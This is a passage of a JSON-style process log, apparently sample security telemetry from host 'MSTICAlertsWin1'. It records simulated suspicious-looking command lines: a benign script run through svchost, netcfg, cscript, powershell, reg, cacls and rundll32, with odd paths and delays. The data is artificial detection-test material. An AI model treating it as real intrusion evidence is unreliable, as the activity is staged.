-22331 \",\"ping 127.0.0.1 -n 20 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"rundll32 \\\\24611\\\\27906.exe\",\"ping 127.0.0.1 -n 20 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -9507 c:\\\\temp\\\\32250\\\\13043.ps1\",\"ping 127.0.0.1 -n 20 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 6 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 11 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 26 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 18 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -19514 /2556\",\"ping 127.0.0.1 -n 21 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 11 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -10650\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -10650\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -11149 /8068\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -2525\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2780\\\" \\\"1640\\\" \\\"1628\\\" \\\"1644\\\" \\\"0\\\" \\\"0\\\" \\\"1648\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21826 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"rundll32 \\\\10012\\\\26584.exe\",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4605 c:\\\\temp\\\\20191\\\\30968.ps1\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"3760\\\" \\\"1628\\\" \\\"1608\\\" \\\"1632\\\" \\\"0\\\" \\\"0\\\" \\\"1636\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 30 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 21 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -22022 \",\"ping 127.0.0.1 -n 18 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 30 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 14 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"rundll32 \\\\26132\\\\13555.exe\",\"ping 127.0.0.1 -n 18 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -4931 c:\\\\temp\\\\30620\\\\15896.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -4931 c:\\\\temp\\\\30620\\\\15896.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 18 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -26958 /15519\",\"ping 127.0.0.1 -n 18 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -8210\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -21175 \",\"ping 127.0.0.1 -n 18 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"rundll32 \\\\21814\\\\15398.exe\",\"ping 127.0.0.1 -n 18 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -3521 c:\\\\temp\\\\18194\\\\26595.ps1\",\"ping 127.0.0.1 -n 18 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 18 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 20 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 23 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 17 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"taskhostw.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\usoclient.exe RefreshSettings\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 21 \",\"reg c:\\\\diagnostics\\\\WinBenignActivity.cmd -5279 /30391\",\"ping 127.0.0.1 -n 21 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 30 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd -17541\",\"ping 127.0.0.1 -n 25 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 23 \",\"cacls c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 23 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -10858 \",\"ping 127.0.0.1 -n 26 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 14 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 5 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 1 \",\"rundll32 \\\\3567\\\\28584.exe\",\"ping 127.0.0.1 -n 15 \",\"powershell c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -30051 c:\\\\temp\\\\10517\\\\32030.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -30051 c:\\\\temp\\\\10517\\\\32030.ps1\\\"\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping 127.0.0.1 -n 15 \",\"reg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25563 /10689\",\"ping 127.0.0.1 -n 15 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4674\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"cacls \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -12105 \",\"ping 127.0.0.1 -n 15 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"rundll32 \\\\17279\\\\3548.exe\",\"ping 127.0.0.1 -n 15 \",\"powershell \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22572 c:\\\\temp\\\\10720\\\\13334.ps1\",\"ping 127.0.0.1 -n 15 \",\"svchost \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"netcfg \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 15 \",\"cscript \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping 127.0.0.1 -n 2 \",\"svchost c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 2 \",\"netcfg c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping 127.0.0.1 -n 9 \",\"cscript c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MST